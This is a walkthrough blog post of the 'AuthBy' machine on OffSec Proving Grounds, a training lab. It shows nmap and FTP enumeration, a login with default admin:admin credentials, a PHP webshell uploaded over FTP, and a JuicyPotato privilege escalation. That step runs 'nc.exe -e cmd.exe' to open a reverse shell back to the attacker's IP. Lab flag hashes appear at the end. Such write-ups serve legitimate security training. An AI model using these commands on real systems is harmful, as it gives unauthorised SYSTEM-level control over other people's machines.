Authby
Proving Ground Practice Medium Level Machine !
 1.png)
Port Scan Results ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Practice/AuthBy]
└─$ sudo nmap -sC -sV -p- -T4 -vv -oN Nmap_Results.txt -Pn 192.168.235.46
Nmap scan report for 192.168.235.46
Host is up, received user-set (0.12s latency).
Scanned at 2024-06-15 09:27:07 IST for 277s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
| ---------- 1 root root 25 Feb 10 2011 UninstallService.bat
| ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
| ---------- 1 root root 17 Aug 13 2011 StopService.bat
| ---------- 1 root root 18 Aug 13 2011 StartService.bat
| ---------- 1 root root 8736 Nov 09 2011 Settings.ini
| dr-xr-xr-x 1 root root 512 Jun 15 10:57 log
| ---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
| ---------- 1 root root 23 Feb 10 2011 InstallService.bat
| dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
| dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
|_dr-xr-xr-x 1 root root 512 Mar 23 13:28 accounts
242/tcp open http syn-ack ttl 125 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 401 Authorization Required
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
3145/tcp open zftp-admin syn-ack ttl 125 zFTPServer admin
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: LIVDA
| NetBIOS_Domain_Name: LIVDA
| NetBIOS_Computer_Name: LIVDA
| DNS_Domain_Name: LIVDA
| DNS_Computer_Name: LIVDA
| Product_Version: 6.0.6001
|_ System_Time: 2024-06-15T04:01:38+00:00
|_ssl-date: 2024-06-15T04:01:43+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Issuer: commonName=LIVDA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-03-22T06:28:30
| Not valid after: 2024-09-21T06:28:30
| MD5: 9061:326a:78f0:b80d:136a:6894:a2b8:935e
| SHA-1: 45cf:80bf:d688:9930:4453:f7d3:a8ff:25f1:b4fd:3935
| -----BEGIN CERTIFICATE-----
| MIICzjCCAbagAwIBAgIQ2xPxHd7u7p5NNxL2kj5ujzANBgkqhkiG9w0BAQUFADAQ
| MQ4wDAYDVQQDEwVMSVZEQTAeFw0yNDAzMjIwNjI4MzBaFw0yNDA5MjEwNjI4MzBa
| MBAxDjAMBgNVBAMTBUxJVkRBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
| AQEA88lD0jVfQxqaC8iHdskmC7PBDr4YGRoFVFkRsr4ooBcGovFJXyCsHX16eNpM
| kwINUsC/auUX7oa8GNqkSwlBUVuEZncF7pk5uXxp16/69xDDa7SLDtDtBB1osP3j
| y7eWiIDvkWaWvA4t6/D9hUJpp3nnfCLIMjEU2mQEuYylxrfyB8qTzRf3o8rVsQ2U
| 7TI0To215luOuFtSBT05Ex7W6AzxhcHKcuQzs+c2wrPRUUT+ePluvlFSuEqxoIHp
| 9eZ1g9M1D8aQ1/sDCNt3Ye5vcrudW7oWd+/kwSkCreI1Q5o0Ng6HzAWyPWPPiW3D
| S/oHUU1b8660Xg5HD7I68smfvwIDAQABoyQwIjATBgNVHSUEDDAKBggrBgEFBQcD
| ATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAJcCw20pp3BEl3gplqDv
| SFPyI9ex1Hx4eCx5o4Gtb24S6VM2xbktxcwVAuaygccOXoxYKUDnBhsQOWSe2WPn
| Sp1MvAzjkwbZxpu7Z8HbTHbUFC1FquIA78910iJx5BzILie4CyRCaBUP4mGfNiLo
| rjxr/N9nbZ/rIlV8EuoGX6MfN0F+cFrQwqeq84iDZovZMlCwppUaJeLMUIBO8bWp
| lHo60M45eaIaLnW7NsyNgv0rLZHfRx8M69vYcNB3nQSYzOhUMIiLeoiNozdqfSf+
| bbRwceKbES+6P0BWU4FzhxTTmNJl65EU0UFDiffVgtjBkiC85K3aT0/axW3dsMno
| vIw=
|_-----END CERTIFICATE-----
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
FTP Enumeration ⤵️
I checked FTP file system with Anonymous Access 🔻
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Practice/AuthBy]
└─$ ftp 192.168.235.46 21
Connected to 192.168.235.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.235.46:kali): Anonymous
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2048|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Jun 15 10:57 log
---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Mar 23 13:28 accounts
226 Closing data connection.
ftp> cd log
250 CWD Command successful.
ftp> ls
229 Entering Extended Passive Mode (|||2049|)
150 Opening connection for /bin/ls.
total 21043
---------- 1 root root 136 Mar 30 2020 stor-2020-03-30.log
---------- 1 root root 386 Mar 30 2020 retr-2020-03-30.log
---------- 1 root root 0 Jun 15 10:57 log-2024-06-14.log
---------- 1 root root 370 Mar 23 13:28 log-2024-03-22.log
---------- 1 root root 574 Jul 10 2020 log-2020-07-09.log
---------- 1 root root 71178 Mar 30 2020 log-2020-03-30.log
---------- 1 root root 930 Mar 27 2020 log-2020-03-26.log
---------- 1 root root 568 Mar 25 2020 log-2020-03-24.log
---------- 1 root root 568 Mar 05 2015 log-2015-03-05.log
---------- 1 root root 1134 Feb 28 2015 log-2015-02-27.log
---------- 1 root root 572 Nov 03 2014 log-2014-11-03.log
---------- 1 root root 1712 May 22 2013 log-2013-05-22.log
---------- 1 root root 2440 Jun 12 2012 log-2012-06-11.log
---------- 1 root root 1142 May 25 2012 log-2012-05-24.log
---------- 1 root root 208 Dec 15 2011 log-2011-12-15.log
---------- 1 root root 944 Dec 15 2011 log-2011-12-14.log
---------- 1 root root 1150 Dec 14 2011 log-2011-12-13.log
---------- 1 root root 208 Dec 13 2011 log-2011-12-12.log
---------- 1 root root 6877584 Nov 09 2011 log-2011-11-09.log
---------- 1 root root 14575458 Nov 09 2011 log-2011-11-08.log
226 Closing data connection.
ftp> get log-2024-03-22.log
local: log-2024-03-22.log remote: log-2024-03-22.log
229 Entering Extended Passive Mode (|||2050|)
550 Access denied
ftp> cd ..
dir
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2051|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Jun 15 10:57 log
---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Mar 23 13:28 accounts
226 Closing data connection.
ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2053|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Mar 23 13:28 backup
---------- 1 root root 764 Mar 23 13:28 acc[Offsec].uac
---------- 1 root root 1032 Jun 15 11:01 acc[anonymous].uac
---------- 1 root root 926 Mar 23 13:28 acc[admin].uac
226 Closing data connection.
ftp> get acc[Offsec].uac
local: acc[Offsec].uac remote: acc[Offsec].uac
229 Entering Extended Passive Mode (|||2054|)
550 Access denied
ftp> cd backup
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2055|)
150 Opening connection for /bin/ls.
total 4
---------- 1 root root 764 Jul 10 2020 acc[Offsec].uac
---------- 1 root root 1030 Jul 10 2020 acc[anonymous].uac
---------- 1 root root 926 Jul 10 2020 acc[admin].uac
226 Closing data connection.
ftp>
Now I simply try the FTP login with default cred like admin : admin and I got in 🔻
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Practice/AuthBy]
└─$ ftp 192.168.235.46 21
Connected to 192.168.235.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.235.46:kali): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2061|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
ftp> lcd /home/kali/Downloads/reverse-shell
Local directory now: /home/kali/Downloads/reverse-shell
ftp> put php_webshell.php
local: php_webshell.php remote: php_webshell.php
229 Entering Extended Passive Mode (|||2062|)
150 File status okay; about to open data connection.
100% |******************************************************************************************| 20320 173.46 KiB/s 00:00 ETA
226 Closing data connection.
20320 bytes sent in 00:00 (59.15 KiB/s)
ftp>
I got access to the web servers page so I uploaded my php_webshell.php file and got the webshell 🔻
Then I got a stable shell and checked the system information’s with systeminfo command and the privileges.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
C:\wamp\www>systeminfo
systeminfo
Host Name: LIVDA
OS Name: Microsoftr Windows Serverr 2008 Standard
OS Version: 6.0.6001 Service Pack 1 Build 6001
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 92573-OEM-7502905-27565
Original Install Date: 12/19/2009, 11:25:57 AM
System Boot Time: 6/14/2024, 8:51:07 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,648 MB
Page File: Max Size: 1,983 MB
Page File: Available: 1,532 MB
Page File: In Use: 451 MB
Page File Location(s): N/A
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): N/A
C:\wamp\www>
I got SeImpersonatePrivilege Enabled so lets use any potato tool to impersonate to higher privileged user 🔻
I will be using JuicyPotato Tool because this system is from 2008 old that’s why.
1
2
3
4
5
6
7
8
9
10
C:\wamp\www>
C:\wamp\www>Juicy.Potato.x86.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.45.214 4444" -t *
Juicy.Potato.x86.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.45.214 4444" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\wamp\www>
I got the call back on port 4444 on attackers machine and I am nt authority\system , that’s huge !!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Practice/AuthBy]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.214] from (UNKNOWN) [192.168.235.46] 49181
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BCAD-595B
Directory of C:\Users
07/09/2020 11:07 AM <DIR> .
07/09/2020 11:07 AM <DIR> ..
02/14/2010 05:16 PM <DIR> Administrator
06/14/2024 09:42 PM <DIR> apache
01/19/2008 02:40 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 6,029,238,272 bytes free
C:\Users>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 0022F7D4 BCAD:595B
C:.
+---Administrator
| +---Contacts
| +---Desktop
| | proof.txt
| | WampServer.lnk
| | zFTPServer Administration.lnk
| |
| +---Documents
| +---Downloads
| | WampServer2.2a-x64.exe
| | zFTPServer_Suite_Setup.exe
| |
| +---Favorites
| | +---Links
| | | Customize Links.url
| | |
| | +---Microsoft Websites
| | | IE Add-on site.url
| | | IE site on Microsoft.com.url
| | | Marketplace.url
| | | Microsoft At Home.url
| | | Microsoft At Work.url
| | | Welcome to IE7.url
| | |
| | +---MSN Websites
| | | MSN Autos.url
| | | MSN Entertainment.url
| | | MSN Money.url
| | | MSN Sports.url
| | | MSN.url
| | | MSNBC News.url
| | |
| | \---Windows Live
| | Get Windows Live.url
| | Windows Live Gallery.url
| | Windows Live Mail.url
| | Windows Live Spaces.url
| |
| +---Links
| | Documents.lnk
| | Music.lnk
| | Pictures.lnk
| | Public.lnk
| | Recently Changed.lnk
| | Searches.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| | Recent Documents.search-ms
| | Recent E-mail.search-ms
| | Recent Music.search-ms
| | Recent Pictures and Videos.search-ms
| | Recently Changed.search-ms
| | Shared By Me.search-ms
| |
| \---Videos
+---apache
| | certutil.log
| |
| +---Contacts
| +---Desktop
| | local.txt
| |
| +---Documents
| +---Downloads
| +---Favorites
| | | disable.url
| | |
| | +---Links
| | | Customize Links.url
| | |
| | +---Microsoft Websites
| | | IE Add-on site.url
| | | IE site on Microsoft.com.url
| | | Marketplace.url
| | | Microsoft At Home.url
| | | Microsoft At Work.url
| | | Welcome to IE7.url
| | |
| | +---MSN Websites
| | | MSN Autos.url
| | | MSN Entertainment.url
| | | MSN Money.url
| | | MSN Sports.url
| | | MSN.url
| | | MSNBC News.url
| | |
| | \---Windows Live
| | Get Windows Live.url
| | Windows Live Gallery.url
| | Windows Live Mail.url
| | Windows Live Spaces.url
| |
| +---Links
| | Documents.lnk
| | Music.lnk
| | Pictures.lnk
| | Public.lnk
| | Recently Changed.lnk
| | Searches.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| | Recent Documents.search-ms
| | Recent E-mail.search-ms
| | Recent Music.search-ms
| | Recent Pictures and Videos.search-ms
| | Recently Changed.search-ms
| | Shared By Me.search-ms
| |
| \---Videos
\---Public
+---Documents
+---Downloads
+---Music
| \---Sample Music
+---Pictures
| \---Sample Pictures
\---Videos
\---Sample Videos
C:\Users>type apache\Desktop\local.txt
type apache\Desktop\local.txt
bb03eea00e27705d13b2922274499a85
C:\Users>type administrator\Desktop\local.txt
type administrator\Desktop\local.txt
The system cannot find the file specified.
C:\Users>type Administrator\Desktop\proof.txt
type Administrator\Desktop\proof.txt
80c1fbca87d095b957beea863934195e
C:\Users>
If you have any questions or suggestions, please leave a comment below. Thank You !
This post is licensed under CC BY 4.0 by the author.